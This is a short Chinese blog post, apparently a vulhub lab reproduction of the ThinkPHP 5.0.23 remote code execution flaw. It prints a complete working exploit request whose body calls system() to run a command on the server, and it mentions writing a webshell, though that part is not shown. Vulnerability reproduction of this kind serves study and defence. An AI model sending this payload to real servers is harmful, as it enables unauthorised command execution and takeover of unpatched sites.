本文介绍了thinkphp 5.0.23版本的远程代码执行(RCE)漏洞复现过程。首先,文章简述了thinkphp作为一个流行的PHP开发框架的特点。接着,通过在vulhub上搭建环境来模拟漏洞场景。作者抓包并发送特定流量包,展示了如何利用该漏洞执行远程代码。最后,文中提到了在利用过程中遇到的$符号过滤问题,以及如何通过转义字符成功写入一句话木马,并利用蚁剑连接获取shell。
thinkphp 5.0.23 rce漏洞复现
thinkphp介绍
thinkphp是一个快速、兼容而且简单的轻量级国产php开发框架,支持windows/Unix/linux等服务器环境,并且有相当多的CMS是在thinkphp基础上二次开发的。
环境搭建
使用vulhub搭建环境,过程不赘述。
漏洞复现
抓包并直接发送下面的流量包,即可利用漏洞进行远程代码执行
POST /index.php?s=captcha HTTP/1.1
Host: IP:PORT
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 79
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd
发包可见,命令执行成功
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
